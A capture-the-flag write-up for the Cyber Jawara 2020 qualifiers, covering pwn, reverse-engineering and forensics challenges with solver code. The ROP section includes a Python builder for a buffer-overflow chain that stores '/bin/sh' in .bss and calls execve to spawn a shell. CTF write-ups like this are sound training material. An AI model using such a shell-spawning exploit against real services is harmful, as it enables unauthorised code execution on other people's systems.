Cyber Jawara 2020 Quals
Cyber Jawara is a national-scale hacking competition from Indonesia. In this article I will explain some of the challenges I solved during the competition.
Syscall | Pwn
Description
Syscalls are one of the important foundations of an operating system. Therefore, knowing about syscalls is mandatory when doing binary exploitation research or operating system security research.
Below is a service that will execute a syscall on a Linux x86 64-bit system.
nc pwn.cyber.jawara.systems 13371
Solution
We were given a service that asks for a syscall number and five arguments. Since the program leaks the address of the flag, we can simply request the write syscall (number 1 on x86-64) with file descriptor 1, the leaked address and a length, and the service prints the flag for us.
FLAG: CJ2020{penting_loh_orang_security_tau_syscall}
ROP | Pwn
Description
Return Oriented Programming (ROP) is one of the tricks commonly used to execute code when the instruction pointer can already be controlled but injecting or executing shellcode is not possible. The basic idea of ROP is to use short pieces of machine instructions in the binary or a library that end in ret (return) or call (including syscall), commonly called ROP gadgets. These gadgets are arranged so that execution jumps from one to the next and ultimately carries out the commands we want.
Below is a service with a buffer overflow vulnerability and no canary protection (stack protector), so you can overwrite the instruction pointer starting from the 17th byte of input. The binary is compiled statically linked, but you do not have access to the binary. All you get is information about the ELF binary and a collection of gadget addresses you can use.
nc pwn.cyber.jawara.systems 13372
Solution
Another service-only challenge. We were given two files: one with information about the binary and one containing a lot of gadget addresses. Since we control the instruction pointer and the binary has a buffer overflow vulnerability, we can build a ROP chain that calls execve() and spawns a shell. The gadget mov qword ptr [rdx], rax ; ret lets us store the string /bin/sh (7 bytes plus a NUL terminator, exactly one qword) in the .bss segment, which is writable and sits at a known address in this statically linked binary; that address then serves as the path argument to execve. This is my exploit for this challenge.
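The two pwn challenges above share the same idea, the x86-64 Linux syscall convention (number in rax, arguments in rdi, rsi, rdx, r10, r8, r9). The following is an added example, not the author's exploit or the challenge files: it maps a syscall request onto registers (for the Syscall challenge, write(1, flag_addr, len)) and builds the execve ROP chain described above. The gadget addresses, the .bss address and the key names in EXAMPLE_GADGETS are hypothetical, since the real gadget file is not reproduced here; the chain layout and the 16-byte overflow offset follow the challenge description.

```python
import struct

# x86-64 Linux syscall ABI: number in rax, arguments in these registers in order
SYSCALL_ARG_REGS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")
SYS_WRITE = 1
SYS_EXECVE = 59


def syscall_regs(number, args):
    """Map a syscall number and up to six arguments onto the registers the
    kernel reads them from; unused argument registers are set to zero."""
    if len(args) > len(SYSCALL_ARG_REGS):
        raise ValueError("x86-64 syscalls take at most six arguments")
    padded = list(args) + [0] * (len(SYSCALL_ARG_REGS) - len(args))
    regs = {"rax": number}
    regs.update(zip(SYSCALL_ARG_REGS, padded))
    return regs


def write_flag_request(flag_addr, length):
    """Syscall challenge: write(1, flag_addr, length) prints the leaked flag."""
    return syscall_regs(SYS_WRITE, [1, flag_addr, length])


def p64(value):
    return struct.pack("<Q", value)


def build_execve_chain(gadgets, bss_addr, overflow_offset=16):
    """ROP challenge: store "/bin/sh\\0" into .bss with the
    `mov qword ptr [rdx], rax ; ret` gadget, then execve(bss_addr, 0, 0)."""
    binsh = b"/bin/sh\x00"                   # 8 bytes: exactly one qword store
    chain = b"A" * overflow_offset           # saved rip is overwritten from byte 17
    chain += p64(gadgets["pop_rax"]) + binsh
    chain += p64(gadgets["pop_rdx"]) + p64(bss_addr)
    chain += p64(gadgets["mov_qword_rdx_rax"])      # [bss] = "/bin/sh\0"
    chain += p64(gadgets["pop_rdi"]) + p64(bss_addr)  # pathname
    chain += p64(gadgets["pop_rsi"]) + p64(0)         # argv = NULL
    chain += p64(gadgets["pop_rdx"]) + p64(0)         # envp = NULL
    chain += p64(gadgets["pop_rax"]) + p64(SYS_EXECVE)
    chain += p64(gadgets["syscall"])
    return chain


def chain_qwords(chain, overflow_offset=16):
    """Split the chain after the padding into the qwords the stack will hold."""
    body = chain[overflow_offset:]
    return [struct.unpack("<Q", body[i:i + 8])[0] for i in range(0, len(body), 8)]


def has_bad_bytes(chain, bad=b"\n"):
    """A newline inside an address truncates input read with fgets()/scanf()."""
    return any(b in chain for b in bad)


# Hypothetical addresses, not taken from the challenge's gadget file
EXAMPLE_GADGETS = {
    "pop_rax": 0x4493E7,
    "pop_rdi": 0x4016C3,
    "pop_rsi": 0x4049DE,
    "pop_rdx": 0x4017CF,
    "mov_qword_rdx_rax": 0x47D53E,
    "syscall": 0x4012E3,
}
EXAMPLE_BSS = 0x4C5000  # hypothetical writable .bss address

if __name__ == "__main__":
    print(write_flag_request(0x404060, 64))
    chain = build_execve_chain(EXAMPLE_GADGETS, EXAMPLE_BSS)
    for q in chain_qwords(chain):
        print(hex(q))
    print("bad bytes:", has_bad_bytes(chain))
```

Run the bad-byte check before sending: a gadget address containing 0x0a would cut the chain short if the service reads a line, and the fix is to pick another gadget from the list with the same semantics.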
FLAG: CJ2020{belajar_bikin_ropchain_sendiri_dong}
RANJAU | Pwn
Description
Let's play a hard game! You are given a 4x4 grid. Every turn, you must choose one cell that is free of mines. Of course the mine positions are always randomized, as in minesweeper. The flag will be shown when you manage to survive for 8 turns.
nc pwn.cyber.jawara.systems 13373
Solution
Unfortunately, I did not solve this challenge during the competition, for various reasons. In this challenge we have to choose the right position and avoid the mines 8 times. After surviving 8 turns, we get the flag from the win() function. To solve this challenge I wrote a simple script to find the right input.
Once we found the right input, we can send that string 8 times to get the flag.
FLAG: CJ2020{hacker_beneran_nge-cheat_pakai_exploit_sendiri}
BabyBaby | Reverse Engineering
Description
This binary can be used as a starting point for learning reverse engineering.
Tip: this challenge is easier to solve with static analysis, for example using Ghidra (free) or IDA Pro (paid) to generate C-like code from the machine code inside the binary.
Solution
We were given a binary; here is the pseudocode of that binary.
As you can see, we have to find the correct numbers for the v4, v3 and v6 variables. To find them I used z3.
Running the script gives the correct numbers.
Now let's enter the correct numbers into the binary.
FLAG: CJ2020{b4A4a4BBbb7yy}
Holmes Code | Reverse Engineering
Description
This is a secret code from Dr. Watson to Holmes. Please check the message in the code.
Solution
In this challenge we were given a bunch of binaries, 288 in total. Every binary does essentially the same thing, but if we look closely, the instructions at addresses 0x6000c9 and 0x6000cc have different immediate values in every binary. To solve this challenge we take the value from the comparison at 0x6000cc (cmp dl, 0xec in this binary) and subtract the 0x1e used by the instruction just before it, and so on for the rest.
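The pattern the passage describes is an arithmetic transform of the input byte followed by a compare against a constant, so the input is recovered by inverting the transform. The following is an added example, not the author's solver: it decodes the two instructions from raw bytes (opcode 0x80 with a ModRM of 0xC2/0xEA/0xF2 is add/sub/xor dl, imm8 and 0xFA is cmp dl, imm8, each three bytes long, which matches the 3-byte gap between 0x6000c9 and 0x6000cc) and inverts whichever operation a given binary uses. The load address 0x600000, the assumption that it maps to file offset 0, and the sample byte snippets are constructed for the example, not taken from the challenge files.

```python
from pathlib import Path

BASE_VADDR = 0x600000    # assumed load address of these tiny ELFs (file offset 0)
CHECK_VADDR = 0x6000C9   # first varying instruction; the cmp follows at 0x6000cc

# "op dl, imm8" encodings: opcode 0x80, ModRM mod=11 rm=dl, reg field selects the op
MODRM_OPS = {0xC2: "add", 0xEA: "sub", 0xF2: "xor"}   # /0, /5, /6
MODRM_CMP = 0xFA                                      # /7 cmp dl, imm8


def decode_check(code):
    """Decode `op dl, imm8 ; cmp dl, imm8` from six raw bytes -> (op, imm, expected)."""
    if len(code) < 6 or code[0] != 0x80 or code[3] != 0x80 or code[4] != MODRM_CMP:
        raise ValueError("unexpected instruction bytes: %s" % bytes(code).hex())
    op = MODRM_OPS.get(code[1])
    if op is None:
        raise ValueError("unsupported ModRM byte 0x%02x" % code[1])
    return op, code[2], code[5]


def invert_check(op, imm, expected):
    """Solve `(c op imm) & 0xff == expected` for the input byte c."""
    if op == "add":
        return (expected - imm) & 0xFF
    if op == "sub":
        return (expected + imm) & 0xFF
    if op == "xor":
        return expected ^ imm
    raise ValueError("unknown op %r" % op)


def recover_char(code):
    """One character per binary: invert the check encoded in `code`."""
    return chr(invert_check(*decode_check(code)))


def recover_from_elf(data, vaddr=CHECK_VADDR, base=BASE_VADDR):
    """Pull the six instruction bytes out of a whole file image and recover the char."""
    off = vaddr - base
    return recover_char(data[off:off + 6])


def solve_all(paths):
    """Recover the message from many binaries, one character each, in the given order."""
    return "".join(recover_from_elf(Path(p).read_bytes()) for p in paths)


# Constructed stand-ins for the bytes at 0x6000c9 of three different binaries
SAMPLE_SNIPPETS = [
    bytes([0x80, 0xC2, 0x1E, 0x80, 0xFA, 0x61]),   # add dl,0x1e ; cmp dl,0x61 -> 'C'
    bytes([0x80, 0xEA, 0x1E, 0x80, 0xFA, 0x2C]),   # sub dl,0x1e ; cmp dl,0x2c -> 'J'
    bytes([0x80, 0xF2, 0x1E, 0x80, 0xFA, 0x2C]),   # xor dl,0x1e ; cmp dl,0x2c -> '2'
]

if __name__ == "__main__":
    print("".join(recover_char(s) for s in SAMPLE_SNIPPETS))
```

Because the check is a single byte with wrap-around, add and sub are inverted modulo 256 and xor is its own inverse; a binary that uses an operation outside the table raises instead of silently producing a wrong character, which is the case you want to notice when looping over 288 files.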
We can simply follow the asm instructions in the same way for the other binaries. Here is my solver code for this challenge.
Running it gives the flag.
FLAG: CJ2020{A_ScaNdal_in_B0h3mia}
Home Sherlock | Reverse Engineering
Description
What is the house number of Sherlock Holmes? Please check the file. Download home: https://drive.google.com/file/d/14P7xZ4XIsEm6HU5WMvOVw6E0BFRH6CuH/view
Solution
We were given a compiled Go binary. This is a simple challenge; we solved it by static analysis of the main function.
As you can see, we can use 44400444004440044 as our input.
After entering the correct number, we get a base64-encoded string; decoding the base64 gives the flag.
FLAG: CJ2020{221B_Baker_Str33t}
FTP | Forensic
Description
The following network capture contains several packets made up of various protocol communications, including FTP. It seems there is something interesting you can learn from it.
Solution
We were given a .pcap file containing some FTP communication. This is an easy challenge: we have to collect all the data carried over the FTP-DATA protocol.
As you can see, the start of the flag format, C, is in a0. To get the flag we collect all the data and order the pieces by their Info column, that is by the name of the transferred file.
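Reassembling the flag from the capture comes down to pairing each FTP-DATA payload with the file name shown in its Info column and concatenating the pieces in file order. The following is an added example, not the author's script: it takes (Info, payload) records, groups payloads by file name, and orders the files naturally so that a10 comes after a2 rather than after a1 as a plain string sort would put it. The Info column format and the records themselves are constructed for the example and the flag they spell is a placeholder, not the challenge flag.

```python
import re

# Wireshark-style Info column for FTP-DATA segments (format assumed for this example)
INFO_RE = re.compile(r"\(RETR (?P<name>\S+)\)")


def natural_key(name):
    """Sort key that orders 'a2' before 'a10' (a plain string sort would not)."""
    return [int(t) if t.isdigit() else t for t in re.split(r"(\d+)", name)]


def reassemble(records):
    """records: iterable of (info, payload_bytes). Payloads are grouped by the
    file name in Info, kept in capture order within a file, and the files are
    concatenated in natural name order. Records without a RETR name (control
    channel, other protocols) are skipped."""
    by_name = {}
    for info, payload in records:
        m = INFO_RE.search(info)
        if not m:
            continue
        by_name.setdefault(m.group("name"), []).append(payload)
    return b"".join(b"".join(by_name[n]) for n in sorted(by_name, key=natural_key))


# Constructed records: out of capture order, two-digit indexes, one control-channel line
SAMPLE_RECORDS = [
    ("FTP Data: 1 bytes (PASV) (RETR a10)", b"t"),
    ("FTP Data: 1 bytes (PASV) (RETR a0)", b"C"),
    ("Request: RETR a3", b""),                    # control channel, no payload
    ("FTP Data: 1 bytes (PASV) (RETR a2)", b"2"),
    ("FTP Data: 1 bytes (PASV) (RETR a1)", b"J"),
    ("FTP Data: 1 bytes (PASV) (RETR a11)", b"}"),
    ("FTP Data: 1 bytes (PASV) (RETR a3)", b"0"),
    ("FTP Data: 1 bytes (PASV) (RETR a5)", b"0"),
    ("FTP Data: 1 bytes (PASV) (RETR a4)", b"2"),
    ("FTP Data: 1 bytes (PASV) (RETR a7)", b"t"),
    ("FTP Data: 1 bytes (PASV) (RETR a6)", b"{"),
    ("FTP Data: 1 bytes (PASV) (RETR a9)", b"s"),
    ("FTP Data: 1 bytes (PASV) (RETR a8)", b"3"),
]

if __name__ == "__main__":
    print(reassemble(SAMPLE_RECORDS).decode())
```

The records can come from any exporter that yields Info and payload pairs per packet, for example tshark with -T fields -e _ws.col.Info -e tcp.payload (the payload arrives hex-encoded, so decode it with bytes.fromhex before passing it in).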
Running the script gives the flag.
FLAG: CJ2020{plzuse_tls_kthxx}
Image PIX | Forensic
Description
A secret message from Jim Moriarty to Holmes, hidden in an image.
Solution
This is also a simple challenge: to get the flag we have to extract the RGBA values from this image, since the message is stored directly in the pixel channels.
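To show what "extract the RGBA values" involves without an image library, the following added example (not the author's script) contains a minimal reader for an 8-bit, non-interlaced RGBA PNG using only the standard library: it walks the chunks, inflates the IDAT data, strips the per-scanline filter byte and returns the raw samples, from which the message is read one byte per channel. It only handles filter type 0 and raises on anything else, which is enough for the constructed sample image the block also generates; the challenge image itself is not reproduced here and the embedded text is a placeholder.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(ctype, body):
    """Length, type, body and CRC of one PNG chunk."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_rgba_png(width, height, samples):
    """Constructed test image: 8-bit RGBA, filter type 0 on every scanline."""
    stride = width * 4
    raw = b"".join(b"\x00" + bytes(samples[y * stride:(y + 1) * stride]) for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def read_rgba_pixels(png):
    """Return (width, height, RGBA sample bytes) of a non-interlaced 8-bit RGBA PNG.
    Only filter type 0 (None) is implemented; other filters raise."""
    if png[:8] != PNG_SIG:
        raise ValueError("not a PNG file")
    pos, idat, width, height = 8, [], None, None
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        body = png[pos + 8:pos + 8 + length]
        if ctype == b"IHDR":
            width, height, depth, color, _, _, interlace = struct.unpack(">IIBBBBB", body)
            if (depth, color, interlace) != (8, 6, 0):
                raise ValueError("only 8-bit non-interlaced RGBA is supported")
        elif ctype == b"IDAT":
            idat.append(body)
        elif ctype == b"IEND":
            break
        pos += 12 + length
    if width is None:
        raise ValueError("missing IHDR")
    raw = zlib.decompress(b"".join(idat))
    stride = width * 4
    out = bytearray()
    for y in range(height):
        line = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if line[0] != 0:
            raise ValueError("filter type %d not implemented" % line[0])
        out += line[1:]
    return width, height, bytes(out)


def extract_message(png):
    """Read the text stored one byte per channel (R, G, B, A, R, G, B, A, ...)."""
    _, _, samples = read_rgba_pixels(png)
    return samples.split(b"\x00", 1)[0].decode("ascii")


SECRET = b"CJ2020{s4mpl3}"   # constructed placeholder, not the challenge flag


def sample_png(width=4, height=2):
    samples = list(SECRET) + [0] * (width * height * 4 - len(SECRET))
    return make_rgba_png(width, height, samples)


if __name__ == "__main__":
    print(extract_message(sample_png()))
```

Real-world images usually use the other four filter types, so for the actual challenge file a library such as Pillow is the practical choice; the point of the reader is to make visible that the channel bytes are there in the inflated data and that the filter byte at the start of each scanline must be removed before reading them.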
Running the script gives the flag.
FLAG: CJ2020{A_Study_in_Scarlet}